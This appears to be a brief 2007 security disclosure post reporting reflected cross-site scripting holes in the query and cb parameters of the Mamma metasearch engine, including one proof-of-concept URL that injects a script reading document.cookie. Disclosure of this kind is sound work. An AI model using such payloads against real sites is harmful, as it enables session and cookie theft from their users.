MOSEB-14: Vulnerabilities at www.mamma.com
22:34 14.06.2007Next participant of the project is Mamma search engine (Mamma Metasearch). It is one of the popular search engines (and it is meta engine).
The vulnerabilities are at Mamma (www.mamma.com) in web search. These Cross-Site Scripting holes I found 30.05.2007.
XSS:
The vulnerabilities are in query and cb parameters:
http://www.mamma.com/Mamma?cb=Askjeeves_mamma&query=test--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Moral: meta searching can be dangerous.